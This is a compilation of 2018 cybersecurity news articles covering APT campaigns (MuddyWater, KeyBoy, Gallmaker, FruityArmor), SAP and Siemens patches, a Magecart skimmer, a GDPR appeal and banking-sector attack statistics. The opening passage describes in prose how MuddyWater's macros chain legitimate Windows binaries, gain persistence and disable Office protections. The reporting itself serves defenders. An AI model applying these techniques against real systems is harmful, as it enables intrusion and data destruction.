The attacks used new spear-phishing documents and relied on social engineering to trick users into enable malicious macros. Password-protected to hinder analysis, the macros in the malicious documents execute obfuscated VBA code when enabled.

Base64-encoded, the macro payload drops three files in the “ProgramData” folder and also adds a registry entry in the current user’s RUN key (HKCU) to ensure execution when the user next logs in. Sometimes, the macro spawns the malicious payload/process instantly and doesn’t wait for the next user login.

The attacks leverage legitimate executables from Microsoft, all of which are whitelisted, thus ensuring the payload’s execution. The macro drops either INF, SCT, and text files or VBS and text files.

In the first scenario, INF is launched via the advpack.dll “LaunchINFSection” function to register the SCT file (scriptlet file) via scrobj.dll (Microsoft Scriptlet library). Next, JavaScript or VBscript code in the SCT leverages WMI (winmgmt) to spawn a PowerShell one-liner that consumes the text file.

In the second scenario, the VBS file decodes itself and calls mshta.exe. One line of VBScript code passed to mshta spawns a PowerShell one-liner to consume the text file.

The one-liner PowerShell code reads the encoded text file dropped in ProgramData and decodes it to obfuscated code.

The code disables the Macro Warnings and Protected View in Office, to ensure future attacks can be performed without user interaction. It also checks the running processes against a hardcoded list and reboots the machine if it finds any match.

For communication with the command and control (C&C) server, the code randomly selects a URL from a list. If communication fails, it attempts to connect to another randomly selected URL from that list, then sleeps from one to 30 seconds and loops again.

Once a machine has been infected, the code attempts to obtain the victim’s public IP and sends the information along with OS version, internal IP, machine name, domain name, and username to the C&C, which allows the attackers to filter victims.

Based on commands received from the C&C, the code can take screenshots, retrieve another stage of the PowerShell code that is executed via Excel, Outlook, or Explorer.exe, download files from the C&C and save them to “ProgramData,” destroy the disk drives C, D, E, F and then reboot the system, or simply reboot or shut down the victim’s machine.

Most of the group’s victims are in Jordan, Turkey, Iraq, Pakistan, Saudi Arabia, Afghanistan and Azerbaijan, but Russia, Iran, Bahrain, Austria and Mali were also impacted. The attacks, Kaspersky notes, are geopolitically motivated, targeting sensitive personnel and organizations.

“The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering, in addition to the active development of attacks, infrastructure and the use of new methods and techniques. The attackers are actively improving their toolkit in an effort to minimize their exposure to security products and services,” Kaspersky concludes.


KeyBoy Abuses Popular Office Exploits for Malware Delivery
11.10.2018 securityweek
Exploit  Virus

A group of hackers believed to be operating out of China was observed using popular Microsoft Office exploits for the delivery of malware.

The actor, known as KeyBoy, was first identified in 2013 and has been observed mainly targeting governments and other organizations in South East Asia. The group continues to be active, although it has expanded the targets list, and even hit the energy sector.

Recently, the group was seen abusing an open source version of the popular CVE-2017-0199 exploit to target India's Ambassador to Ethiopia. The actor used a phishing email with an attached document that would download and execute a script to install the final payload.

According to AlienVault, which has been tracking KeyBoy’s whereabouts, the group has been also testing the use of another exploit generator. Because the actor didn’t change the default settings in the tool, the document meta-data included obvious hints that the document was malicious.

In this case, however, the data hinted at another Office exploit that was previously abused in attacks, namely CVE-2017-8570.

The attacks, AlienVault says, were meant to drop the malware family known as TSSL to the victims’ computers. The malware had been associated with the group last year, and was present in more recent attacks as well.

In August 2018, Citizen Lab detailed a campaign targeting Tibetan activists, journalists, members of the Tibetan Parliament in exile, and the Central Tibetan Administration, where TSSL was also used. They linked the campaign to a larger operation called Tropic Trooper, which was ousted in 2016.

The group also continued delivering the Android malware family known as Titan, AlienVault’s security researchers reveal. While the infections continue, however, only older sources of the files have been identified.

The files were traced back to a user posting malicious APKs on a Taiwanese site (apk.tw) for downloading Android applications. However, the individual stopped posting several years ago, and the researchers couldn’t identify a new source of Titan samples.


New Gallmaker APT group eschews malware in cyber espionage campaigns
11.10.2018 securityaffairs
APT

A previously unknown cyber espionage group, tracked as Gallmaker, has been targeting entities in the government, military and defense sectors since at least 2017.
A new cyber espionage group tracked as Gallmaker appeared in the threat landscape. According to researchers from Symantec, who first spotted the threat actor, the group has launched attacks on several overseas embassies of an unnamed Eastern European country, and military and defense organizations in the Middle East.

Gallmaker is a politically motivated APT group that focused its surgical operations on the government, military or defense sectors.

Gallmaker been active since at least December 2017, researchers observed a spike in its operations in April and most recent attacks were uncovered in June.

Gallmaker activity

The experts speculate the threat a nation-state actor, it is interesting to note that the APT is relying entirely on code scraped from the public internet.

“This group eschews custom malware and uses living off the land (LotL) tactics and publicly available hack tools to carry out activities that bear all the hallmarks of a cyber espionage campaign,” reads the analysis published by Symantec.

“The most interesting aspect of Gallmaker’s approach is that the group doesn’t use malware in its operations. Rather, the attack activity we observed is carried out exclusively using LotL tactics and publicly available hack tools.”

Gallmaker uses spear phishing messages using a weaponized Office document that uses the Dynamic Update Exchange (DDE) protocol to execute commands in the memory of the targeted device.

“These lure documents use titles with government, military, and diplomatic themes, and the file names are written in English or Cyrillic languages. These documents are not very sophisticated, but evidence of infections shows that they’re effective.” continues Symantec.

“By running solely in memory, the attackers avoid leaving artifacts on disk, which makes their activities difficult to detect.”

Once the attackers gain access to a target machine, they use various tools including the reverse_tcp reverse shell from Metasploit, the WindowsRoamingToolsTask PowerShell scheduler, the WinZip console, and an open source library named Rex PowerShell, which helps create PowerShell scripts for Metasploit exploits.

Experts discovered that Gallmaker APT is using three primary IP addresses for its C&C infrastructure, they also noticed the attackers use to delete some of its tools from compromised machines once it is completed the attack, likely to hide traces of their activity.

“The fact that Gallmaker appears to rely exclusively on LotL tactics and publicly available hack tools makes its activities extremely hard to detect. We have written extensively about the increasing use of LotL tools and publicly available hack tools by cyber criminals.” concluded Symantec. “One of the primary reasons for the increased popularity of these kinds of tools is to avoid detection; attackers are hoping to “hide in plain sight”, with their malicious activity hidden in a sea of legitimate processes.”


SAP October 2018 set of patches fixes first Hot News security note for SAP BusinessObjects in 5 years
11.10.2018 securityaffairs
Vulnerebility

SAP released its October 2018 set of patches, it includes the first Hot News security note for SAP BusinessObjects in over five years.
SAP released its October 2018 set of patches that included 11 security notes, the company also released 4 updates to previously released notes.

The patches include 15 notes, 2 rated Hot News and one of which is the first note for SAP BusinessObjects in over five years.

“SAP BusinessObjects BI Suite has an Information Disclosure vulnerability (CVSS Base Score: 9.8 CVE-2018-2471). An attacker can use it to reveal additional information (system data, debugging information, etc.) that will help to learn about a system and plan other attacks.” reads a blog post published by ERPScan.

The remaining notes include 4 High priority and 9 Medium priority, in October Information Disclosure is the largest group in terms of the number of vulnerabilities.

businessObjects sap-notes-october-2018-types-1

The most important note (CVSS score of 9.8) addresses an information disclosure issue in the SAP BusinessObjects Business Intelligence Suite client tracked as CVE-2018-2471.

“Under certain conditions SAP BusinessObjects Business Intelligence Platform 4.10 and 4.20 allows an attacker to access information which would otherwise be restricted.” reads the security advisory.

The second Hot News in the October 2018 set of patches is an update to Security Note released on April 2018, it provides security updates for the Chromium browser delivered with SAP Business Client.

The High priority flaws addressed by SAP in October are:

2699726 [CVE-2018-2475] Missing network isolation in Gardener
Product – project “Gardener”; Versions – 0.12.2 High 8.5
2674215 Denial of service (DOS) in OPC UA applications of SAP Plant Connectivity
Related CVEs – CVE-2018-12585, CVE-2018-12086
Product – SAP Plant Connectivity; Versions – 15.0, 15.1, 15.2 High 8.2
2392860 Update to Security Note released on February 2017 Patch Day:
Leveraging privileges by customer transaction code
Product – SAP Records Management; Versions – 7.0 to 7.02, 7.10, 7.11, 7.30, 7.31, 7.40, 7.50, 7.51 High 8.0
2681207 Update to Security Note released on September 2018 Patch Day:
[CVE-2018-2465] Missing XML Validation vulnerability in SAP HANA, Extended Application Services classic model
Product – SAP HANA; Versions – 1.0, 2.0 High 7.5
Experts from security firm ERPScan noticed that chaining the missing network isolation in Gardener theoretically can lead to compromise of clusters in the application context

The others SAP security notes address vulnerabilities in in Netweaver Application Server for ABAP (CVE-2018-2470), BusinessObjects (CVE-2018-2472, CVE-2018-2467), Data Services (CVE-2018-2466), Plant Connectivity (CVE-2017-12069), Adaptive Server Enterprise (CVE-2018-2469, CVE-2018-2468), and Fiori (CVE-2018-2474).

This patch update also addresses 5 Support Package Notes.


Imperva to be Acquired for $2.1 Billion by Thoma Bravo
11.10.2018 securityweek
IT

Cybersecurity solutions firm Imperva today announced that it has agreed to be acquired by private equity firm Thoma Bravo for roughly $2.1 billion in cash.

Imperva, which provides solutions such as DDoS protection, Web Application Firewall (WAF), and database security tools, said the company’s Board of Directors unanimously approved the agreement and believes the transaction will maximize stockholder value.

Under the terms of the agreement, Imperva stockholders will receive $55.75 per share in cash.

Upon the close of the transaction, Imperva will operate as a privately-held company and will maintain its corporate headquarters in Redwood Shores, California and continue to be led by its current executive team.

While Thoma Bravo is hopefull that the deal will close, the merger agreement provides for a 45-day “go-shop” period, during which Imperva’s Board and advisors may actively solicit alternative acquisition proposals and enter into negotiations with other parties.

“During this period, Imperva will have the right to terminate the merger agreement to enter into a superior proposal subject to the terms and conditions of the merger agreement. There can be no assurance this 45-day “go-shop” period will result in a superior proposal. Imperva does not intend to disclose developments about this process unless and until its Board has made a decision with respect to any potential superior proposal,” Imperva said.

Thoma Bravo has placed several large bets through investments in cybersecurity space in recent years.

In May, it announced that it would acquire a majority interest in Security Information and Event Management (SIEM) solutions vendor LogRhythm. In June, the firm acquired a majority interest in identity and access management (IAM) solutions firm Centrify.

Other investments in the sector include SonicWall, SailPoint, Hyland Software, Deltek, Blue Coat Systems, Imprivata, Bomgar, Barracuda Networks, Compuware and SolarWinds.

“Thoma Bravo has an excellent track record of supporting and adding value to leading cybersecurity companies, and we are delighted to bring on a partner with their caliber of strategic expertise,” said Chris Hylen, President and CEO of Imperva. “This transaction will provide immediate and substantial value to Imperva stockholders. The company will have greater flexibility to focus on executing our long-term strategy. We are excited to begin our partnership with Thoma Bravo.”


Windows Zero-Day Exploited in Attacks Aimed at Middle East
11.10.2018 securityweek
Vulnerebility

One of the vulnerabilities patched by Microsoft with its latest Patch Tuesday updates is a Windows zero-day exploited by an advanced persistent threat (APT) group in attacks aimed at entities in the Middle East.

The flaw, tracked as CVE-2018-8453, has been described by Microsoft as a privilege escalation issue related to how the Win32k component of Windows handles objects in memory. An authenticated attacker can exploit the vulnerability to take control of an affected system.

The vulnerability was reported to Microsoft by Kaspersky Lab after one of the security firm's systems detected an exploitation attempt. Kaspersky said it had reported the vulnerability to Microsoft on August 17 – it's unclear why Microsoft waited so long to release a fix.

According to Kaspersky, CVE-2018-8453 has been exploited by an APT group it tracks as FruityArmor. The exploit was executed by a malware installer for obtaining the privileges needed to gain persistence on the targeted system.

The security firm said FruityArmor created a high quality and reliable exploit that would work on as many versions of Windows as possible, including Windows 10.

Kaspersky has described the vulnerability as a use-after-free bug that is similar to CVE-2017-0263, a flaw patched by Microsoft back in May 2017 after it had been exploited by the Russia-linked threat actor known as APT28, Sofacy and Fancy Bear.

Hackers packaged the CVE-2018-8453 exploit in a malware installer that requires system privileges to deploy its payload. The payload has been described as a "sophisticated implant used by the attackers for persistent access to the victims' machines."

Kaspersky has seen the exploit being used against less than a dozen targets located in the Middle East.

"So far, this campaign has been extremely targeted, affecting a very low number of victims in the Middle East region, probably persons of interest for the attackers. However, the victimology is not clear, especially with such a small number of victims involved," Kaspersky researchers explained.

The company determined that FruityArmor is likely behind these attacks after discovering a PowerShell backdoor that in the past was only used by this APT group. In addition, some of the command and control (C&C) domains used in the latest campaign were also involved in past FruityArmor operations.

A blog post published early on Wednesday by Kaspersky contains technical details on the vulnerability and how it has been exploited by FruityArmor.

This is not the first time Kaspersky has come across a zero-day vulnerability exploited by FruityArmor. The hackers also exploited a Windows zero-day back in 2016, which Microsoft patched in October 2016 after being alerted by Kaspersky. At the time, the victims were researchers, activists and government-related individuals in Thailand, Iran, Algeria, Yemen, Saudi Arabia and Sweden.

"We believe that although FruityArmor´s activity has been slowly increasing during the last two years, the extremely targeted nature of the attacks helps them fly below the radar," Kaspersky said.


Many Siemens Products Affected by Foreshadow Vulnerabilities
11.10.2018 securityweek
Vulnerebility

Siemens informed customers this week that many of its products are affected by the recently disclosed processor vulnerabilities known as Foreshadow and L1 Terminal Fault (L1TF).

There are a total of three Foreshadow vulnerabilities affecting Intel Core and Xeon CPUs: CVE-2018-3615, which impacts Intel’s Software Guard Extensions (SGX); CVE-2018-3620, which impacts operating systems and System Management Mode (SMM); and CVE-2018-3646, which affects virtualization software and Virtual Machine Monitors (VMM).Foreshadow/ L1TF vulnerabilities affect Siemens products

The security holes could allow malicious applications to obtain potentially sensitive information from a device's memory, including data associated with operating systems, apps and virtual machines.

Siemens noted that several of its industrial products use the impacted Intel processors, including RUGGEDCOM, SIMATIC, SIMOTION and SINUMERIK devices. The Siemens advisory lists more than 30 affected products.

The company has released BIOS updates, workarounds and mitigations to help users prevent potential attacks exploiting the Foreshadow vulnerabilities. The German industrial giant has also advised customers to install available operating system updates.

BIOS updates are currently available for SIMATIC IPC, SIMATIC Field PG, SIMATIC ITP, SIMOTION P and SINUMERIK PCU devices, and the company is working on releasing firmware patches for other products as well.

Since Foreshadow requires the attacker to execute a malicious application on the targeted system, Siemens recommends "limiting the possibilities to run untrusted code if possible," including by applying defense-in-depth methods.

Several organizations have released advisories for the Foreshadow vulnerabilities, including Cisco, F5 Networks, HPE, Synology, Huawei, Lenovo, SonicWall, NetApp, and CERT/CC. While NIST and some of the vendors have classified the flaws as "medium severity," Siemens, Huawei, Lenovo, SonicWall, NetApp, and HPE have assigned CVSS scores that put them in the "high severity" category.


Cyberspy Group 'Gallmaker' Targets Military, Government Organizations
11.10.2018 securityweek
CyberSpy

A previously undocumented cyber espionage group has been targeting entities in the government, military and defense sectors since at least 2017, according to a report published on Wednesday by Symantec.

The threat actor, tracked by the security firm as Gallmaker, has launched attacks on several overseas embassies of an unnamed Eastern European country, and military and defense organizations in the Middle East.

Symantec researchers noted that Gallmaker attacks appear highly targeted, with all known victims being related to the government, military or defense sectors.

The group has been active since at least December 2017 and its most recent attacks were observed in June 2018 – a spike in Gallmaker activity was seen in April. Gallmaker has focused on cyber espionage and experts believe it's likely sponsored by a nation state.

Asked by SecurityWeek about links to other threat actors and the possible location of the hackers, Symantec noted that it tracks Gallmaker as a new cyber espionage group and said it had no information to share on who may be behind the attacks or where the attackers are located.

The security firm pointed out that Gallmaker is interesting because it does not use any actual malware in its operations and instead relies on publicly available tools – this is known in the industry as "living off the land."

Gallmaker attacks start with a specially crafted Office document most likely delivered via phishing emails. The documents are designed to exploit the Dynamic Update Exchange (DDE) protocol to execute commands in the memory of the targeted device.

"By running solely in memory, the attackers avoid leaving artifacts on disk, which makes their activities difficult to detect," Symantec's Attack Investigations Team wrote in a blog post.

Microsoft disabled DDE last year after malicious actors started exploiting it in their attacks. However, Symantec said Gallmaker victims failed to install the Microsoft update that disabled the problematic feature.

Once they gain access to a machine, the attackers use various tools to achieve their objectives. The list includes the reverse_tcp reverse shell from Metasploit, the WindowsRoamingToolsTask PowerShell scheduler, the WinZip console, and an open source library named Rex PowerShell, which helps create PowerShell scripts for Metasploit exploits.

Researchers also noticed that the attackers have deleted some of their tools from compromised machines once they were done, likely in an effort to hide their activities.


First GDPR Enforcement is Followed by First GDPR Appeal
11.10.2018 securityweek
Privacy

In what has been billed as the world's first GDPR action, the UK regulator -- the Information Commissioner's Office (ICO) -- quietly issued an enforcement notice against Canadian firm AggregateIQ Data Services Ltd (AIQ). It is a low-key affair. Although the enforcement notice was issued on 6 July 2018, the notice was not and has not been placed on the ICO's enforcement action page.

Instead, the notice was attached as an appendix to an investigation report by the ICO. There it largely remained unnoticed until found by law firm Mishcon de Reya LLP in September. SecurityWeek asked the ICO, "Is there any reason for the only occurrence (that I can find) of the notice appearing as an addendum to a longer report?" All other questions were answered, but SecurityWeek did not receive a direct answer to this direct question.

However, we were told that AIQ had appealed the notice. Appeals go to the First-tier Tribunal of the General Regulatory Chamber (GRC). They are not normally made public in the UK. SecurityWeek approached the GRC and asked for a copy -- and has now received a copy, slightly redacted, of AIQ's appeal against the GDPR enforcement notice.

Our first article discussed the reasoning behind the ICO's enforcement notice. Now we can look at AIQ's arguments against it. This is an important issue. While lawmakers make laws, it is the judiciary that interprets them. Neither the lawmakers nor the regulators know how the letter of the law will play out until the law has been tested in front of the judiciary. Equally, the subject of the laws -- in this case businesses that use the personal data of EU citizens around the world -- cannot fully understand their exposure to the law until it has faced the scrutiny of the judiciary.

The first specified ground for the appeal is that the ICO has no jurisdiction over AIQ "in this matter". This implies that the reason for appeal is not based on geography, but on the application of the law. SecurityWeek talked to a UK-based lawyer to understand the basis for the AIQ appeal.

AIQ claims, "There is no evidence whatsoever of any 'processing' of the data held for the purposes of 'monitoring' after the in-force date of the GDPR and DPA in 2018..." This may become the pivotal section of the appeal. Was, in GDPR terms, AIQ a data controller and/or a data processor?

"If AIQ is a Data Controller," comments David Flint, Senior Partner at MacRoberts LLP, "there would be an overriding issue of how it had a lawful basis for processing and meeting the [GDPR] Article 5 Principles. If it were a Processor, the question would be the compliance with Article 5 of those who gathered the information and whether they knew that AIQ would be processing the data."

Flint believes that AIQ's term 'monitoring' relates to 'profiling' within the legislation. Recital (24) of GDPR says "profiling a natural person, particularly in order to take decisions concerning her or him or for analysing or predicting her or his personal preferences, behaviours and attitudes", where there is any evaluation of response or otherwise to the activity. The ICO enforcement notice, comments Flint, "suggests that this is what was being done and why the data was being processed."

He adds that "'processing' also includes holding the data, so the fact that the data was still 'held' on 31 May would, in my opinion bring the activities of AIQ squarely within the scope of the GDPR/DPA2018." This is an important point for all companies that may store and forget they have EU data. They don't have to do anything with that data. Merely storing it makes them a data processor under GDPR.

Noticeably, Equifax said that it had 'forgotten' about the storage of EU citizen data in the U.S. This forgotten data resulted in a £500,000 fine from the ICO after the breach.

Data subject 'consent' is likely to be a key issue within GDPR. The ICO finds that the data subjects did not consent for AIQ to use their data. AIQ responds that the ICO has provided no proof that it lacked the consent of the subjects, and it believes that they had provided the information voluntarily to AIQ's clients with at least 'implied consent'. If the tribunal finds in favor of the ICO, it will reinforce the idea that organizations will need to obtain and be able to demonstrate actual and explicit consent from every EU citizen.

AIQ also argues that 'natural justice' should mitigate in its favor. "The position taken by the ICO in the Enforcement Notice and the Order," it claims, "is contrary to the principles of fairness and natural justice (which also may be referred to as the duty on the ICO to act fairly), and breaches AggregateIQ's right to a fair hearing."

Flint has little sympathy here. "I think the arguments of 'natural justice' fall away where there is a specific statutory provision prohibiting the behavior in question," he told SecurityWeek. "The only argument might be one based on ECHR but that would mean that the GDPR was invalid as being in breach." This in itself is an interesting comment. If the appeal were to the European Court of Human Rights, it would largely come down to whether business' rights take precedence over citizens' rights -- which seems unlikely. But if they did, then GDPR would be invalidated as in breach of the European Constitution (just as the original Safe Harbor agreement between the EU and the U.S. was invalidated).

In fairness to AIQ, this is the one section of the appeal that has been largely redacted by the Tribunal. Elsewhere in the appeal, AIQ accuses the ICO of "taking a position which is contrary to previous positions taken by the ICO, resulting in substantial unfairness and the denial of natural justice to AggregateIQ." We will not know until the hearing whether there is any link between the redacted section and AIQ's comment on 'previous positions', nor whether the Tribunal will consider this to be important.

The AIQ Appeal is number EA/2018/0153 with the Tribunal. It was received on 30 July 2018. At the time of writing this, there is no further information on the Tribunal's appeals table.

The result of the appeal is likely to be important. Much of it seems to be unconvincing -- but it doesn't matter what the lawmakers, the regulators, businesses. lawyers or the media think. In the end, it all comes down to how the judiciary interprets the law and the incident. It would be natural for the regulators to put their toe in the water before potentially going after big companies like Google or Facebook. This may partly explain the low publicity so far afforded to this first case.

"Lots to think about," comments Flint; "and an interesting case to follow particularly given that other cases are starting to line up! Wonder what the Tribunal (and I suspect in due course the Courts) will make of it." The final result may well provide clues to how GDPR is likely to play out over the next few years.

There is, however, one further point worth noting. The ICO enforcement notice requires certain action by AIQ. There is no imposed monetary penalty. This leaves one issue undiscussed. If an EU regulator were to impose a financial penalty on an extra-territorial entity, how -- or even could -- that penalty be enforced?


SAP Patches Critical Vulnerability in BusinessObjects
11.10.2018 securityweek
Vulnerebility

This week, SAP released its October 2018 set of patches, which includes the first Hot News security note for SAP BusinessObjects in over five years.

SAP included 11 security notes in its October 2018 Security Patch Day, to which it also added 4 updates to previously released notes. Thus, the patches include 15 notes: 2 rated Hot News, 4 High priority, and 9 Medium priority.

Featuring a CVSS score of 9.8, the most important of the notes addresses an information disclosure issue in the SAP BusinessObjects Business Intelligence Suite client (CVE-2018-2471).

An analytics business intelligence front-end platform, BusinessObjects provides customers with the ability to search and analyze data, and with the option to visualize it and perform predictive analytics.

The information disclosure bug can be triggered through the execution of certain special Central Management Server (CMS) scripts on the Central Management Server. The execution is performed without properly checked authorizations, as ERP and business-critical application security company Onapsis explains.

Additionally, SAP tagged as Hot News an update to a note released in April 2018, which provides security updates for the Chromium browser delivered with SAP Business Client.

The High priority flaws include missing network isolation in Gardener (CVE-2018-2475), denial of service (DOS) in OPC UA applications of SAP Plant Connectivity (CVE-2018-12585, CVE-2018-12086), and updates to previously released notes, affecting SAP Records Management and SAP HANA.

The missing network isolation flaw in Gardener can be combined with other security issues to theoretically lead to the compromise of clusters in the application context, ERPScan, a company that specializes in securing Oracle and SAP products, reveals.

The remaining SAP security notes address bugs in Netweaver Application Server for ABAP (CVE-2018-2470), BusinessObjects (CVE-2018-2472, CVE-2018-2467), Data Services (CVE-2018-2466), Plant Connectivity (CVE-2017-12069), Adaptive Server Enterprise (CVE-2018-2469, CVE-2018-2468), and Fiori (CVE-2018-2474).

Five support package notes are added to the 15 Security Patch Day notes, for a total of 20 security notes. Six of the notes are updates to previously released security notes.

Information disclosure was the most encountered type of vulnerability, followed by cross-site scripting (XSS), XML external entity (XXE), and cross-site request forgery (CSRF).


Magecart Attack Hits 'Shopper Approved'
11.10.2018 securityweek
Attack

Magecart, the web-based card skimmer campaign that targets popular e-commerce websites, has hit Shopper Approved, an organization that provides rating seals for online stores.

The first Magecart attacks were observed a couple of years ago, and they continue to be active. Earlier this year, the cybercriminals behind the operation hit several high profile targets, including British Airways, Ticketmaster, and Newegg.

The hackers also targeted cloud service provider Feedify, which resulted in the potential compromise of hundreds of e-commerce websites.

Now, RiskIQ, the company that has been tracking Magecart since 2015, reveals that the attack on Shopper Approved too was an attempt to skim payment information from multiple online stores at once.

The compromise was first observed on September 15, when RiskIQ received an incident notification regarding Magecart. The attackers had replaced the normal certificate.js file for Shopper Approved with one that included their skimmer.

The attackers apparently replaced the file twice within a 15 minutes window, because they forgot to obfuscate their skimmer at first, which allowed the RiskIQ security researchers to have a look at the deobfuscated code.

The researchers also discovered that the skimmer used the same drop server as the script used in the Feedify attack earlier this year.

Shopper Approved removed the malicious code on September 17, and also launched an internal investigation to find out how the compromise happened and who was affected.

“Fortunately, we were able to quickly detect and secure the code related to the incident. We also put additional security measures in place to help ensure that this doesn't happen again,” Scott Brandley, co-founder of Shopper Approved, says in a notice on their website.

“After a thorough investigation, we were able to determine that only a very small percentage of our clients were involved, and we have already reached out to those clients directly in an effort to help them remediate any issues,” the notice reads.

RiskIQ too notes that only a small number of clients were impacted, despite the fact that Shopper Approved is active on thousands of websites.

Mitigating factors, the security researchers note, include the fact that prominent shopping carts are actively blocking third-party scripts from being allowed to display on checkout pages and that most Shopper Approved clients did not have the compromised script on their actual checkout pages.

Moreover, the skimmer code was designed to only look for checkout pages with specific keywords in the URL. Thus, the script did not impact pages that did not include those keywords.

“Magecart groups are carrying out a full-scale assault on e-commerce and show zero signs of stopping. […] Now, Magecart operatives have learned to tune the CDNs they compromise to ensure that the only sites they hit are online stores. To achieve their goals, they will go after any analytics company, CDN, or any service supplying functionality to e-commerce websites,” RiskIQ concludes.


CVE-2018-8453 Zero-Day flaw exploited by FruityArmor APT in attacks aimed at Middle East
10.10.2018 securityaffairs
APT  Vulnerebility

A Windows zero-day flaw addressed by Microsoft with its latest Patch Tuesday updates is exploited by an APT group in attacks aimed at entities in the Middle East.
The Windows zero-day vulnerability tracked as CVE-2018-8453 is a privilege escalation flaw that was exploited by an APT group in attacks against entities in the Middle East.

The flaw, tracked as CVE-2018-8453, affects the Win32k component of Windows handles objects in memory.

The flaw was discovered by experts from Kaspersky Lab could be exploited by an authenticated attacker to take control of an affected system.

CVE-2018-8453 Win 0day

Kaspersky Lab reported the vulnerability to Microsoft on August 17, roughly two months ago.

Kaspersky revealed that the CVE-2018-8453 vulnerability has been exploited by the APT group tracked as FruityArmor, a cyber-espionage group that was first observed in 2016 while targeting activists, researchers, and individuals related to government organizations.

Experts believe FruityArmor´s activity has been slowly increasing during the last two years.

The zero-day exploit was included by malware installer used by the group to escalate privileges on the target machine and to gain persistence.

The final payload dropped by the malware was a sophisticated implant used by the attackers for persistent access to the victims’ machines.”

“In August 2018 our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in Microsoft Windows operating system. Further analysis into this case led us to uncover a zero-day vulnerability in win32k.sys.” reads the report published by Kaspersky.

“The exploit was executed by the first stage of a malware installer to get necessary privileges for persistence on the victim’s system. The code of the exploit is of high quality and written with the aim of reliably exploiting as many different MS Windows builds as possible, including MS Windows 10 RS4.”

The zero-day resembles an older vulnerability tracked as CVE-2017-0263 that was fixed by Microsoft in May 2017 and that it had been exploited by the Russia-linked cyberespionage group tracked as APT28.

The zero-day exploit was used in targeted attacks against less than a dozen entities located in the Middle East.

“So far, this campaign has been extremely targeted, affecting a very low number of victims in the Middle East region, probably persons of interest for the attackers. However, the victimology is not clear, especially with such a small number of victims involved.” continues the report.

The attribution was possible due to the detection of a PowerShell backdoor that has previously been exclusively used by the FruityArmor APT. Experts also confirmed an overlap in the C2 infrastructure between the last campaign and previous attacks attributed to the group.

Further technical details are reported by Kaspersky experts in their analysis.


Group-IB: $49.4 million of damage caused to Russia’s financial sector from cyber attacks
10.10.2018 securityaffairs
Cyber

Security firm Group-IB has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector
Group-IB, an international company that specializes in preventing cyber attacks, has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector. As stated in Group-IB’s annual report “Hi-Tech Crime Trends 2018” presented at the CyberCrimeCon18 conference, every month, 1-2 banks lose money as a result of cyber attacks, and the damage caused by one successful theft is, on average, $2 million.

“Financial motivation still prevails among APT-groups, however stolen money — is not the most dangerous thing that could happen to a financial organization”, — says Ilya Sachkov, Group-IB CEO and founder. “Since in many countries banks are considered critical infrastructure, they are the targets for state-sponsored hacker groups, specialized in sabotage. One successful attack is capable of destroying one financial organization and even the collapse of a state financial system. Considering this, banks need to rethink their approach to protection against cyber threats. Defense is an outdated strategy. It’s time to stop being victims and become hunters.”

financial sector Russia attacks

In the new report, Group-IB experts described in detail the cyber threats to the financial sector—active APT groups, tactics of the attackers, infection vectors, and new hacker tools.

Targeted attacks on banks:

Active groups and withdrawal methods

Group-IB identifies 4 criminal APT groups that pose a real threat to the financial sector: not only are they able to penetrate a bank’s network and access isolated financial systems, but they can also successfully withdraw money via SWIFT, AWS CBR, card processing and ATMs. These groups are Cobalt, MoneyTaker, Silence, which are led by Russian-speaking hackers, and the North Korean group Lazarus.

Only two criminal groups pose a threat to the SWIFT interbank transfer system: Lazarus and Cobalt, the latter of which, at the end of 2017, conducted the first successful attack in the history of Russia’s financial sector on a bank using SWIFT. According to Group-IB estimates, the number of targeted attacks on banks to conduct thefts via SWIFT in the reporting period increased threefold. In the previous period, three such attacks were recorded: in Hong Kong, Ukraine, and Turkey. In this period, however, there have already been 9 successful attacks in Nepal, Taiwan, Russia, Mexico, India, Bulgaria, and Chile. The good news is that with SWIFT most of the unauthorized transfers can be stopped in time and returned to the banks affected.

Attacks on card processing remain one of the main methods of theft and they are actively used by hackers from Cobalt, MoneyTaker, and Silence. In February 2018, members of Silence conducted a successful attack on a bank and stole money via card processing: they managed to withdraw $522,000 (35 million rubles) from cards via the ATMs of a partner bank. Focusing attacks on ATMs and card processing led to a reduction in the average amount of damage from one attack. However, they allow attackers to conduct these attacks more securely for “drops” who cash out the stolen money. The attackers are in one country, their victim (the bank) in another, and the cashing out is done in a third country.

Withdrawing money through the AWS CBR (Automated Work Station Client of the Russian Central Bank) is actively used by MoneyTaker—in November 2017, they managed to withdraw $104,000 (7 million rubles), but in summer 2018, they successfully stole $865,000 (58 million rubles) from PIR Bank. MoneyTaker has already conducted 16 attacks in the US, 5 on banks in Russia, and 1 in the UK. In the US, the average amount of damage from one attack is $500,000. In Russia, the average amount of funds withdrawn is $1.1 million (72 million rubles). In December 2017, Group-IB published the first report on this group: “MoneyTaker: 1.5 Years of Silent Operations”.

In the designated period, only Cobalt conducted attacks on payment gateways. In 2017, they used this method to steal money from two companies, however, no attempts were made in 2018. They were helped in one of their attacks by members of the group Anunak, which had not conducted at attack of this kind since 2014. Despite the arrest of the gang’s leader in Spain in spring 2018, Cobalt continues to be one of the most active and aggressive groups, steadily attacking financial organizations in Russia and abroad 2-3 times a month.

Attacks on bank customers:

The decline of Android Trojans and the triumph of phishing

In Russia, according to Group-IB experts, there are no longer any groups left that would conduct thefts from individuals using banking Trojans for PCs. This trend aimed at reducing threats from banking Trojans for PCs has been continuing in Russia since 2012.

At present, only three criminal groups—Buhtrap2, RTM, and Toplel—steal money from the accounts of legal entities in Russia. Group-IB experts noted a change in the attackers’ tactics in the second half of 2017: the vector for the distribution of Trojans was no longer the traditional malicious campaigns or hacked popular sites, but the creation of new tailored resources for accountants and companies executives who use remote banking systems (RBSs), payment systems, or cryptocurrency wallets in their work. On the fake resources, the criminals placed code that was designed to download the Buhtrap and RTM Trojans.

Unlike in Russia, on the global stage, the cyber threat landscape has undergone far greater changes. Six new banking Trojans for PCs have emerged: IcedID, BackSwap, DanaBot, MnuBot, Osiris and Xbot. Among the new Trojans, we would like to highlight BackSwap, which initially only attacked banks in Poland, but then moved on to banks in Spain. BackSwap is interesting because it simultaneously implemented several new techniques of introducing code to automatically replace payment details. The greatest threat for bank customers still comes from criminal groups that use the Dridex, Trickbot, and Gozi Trojans.

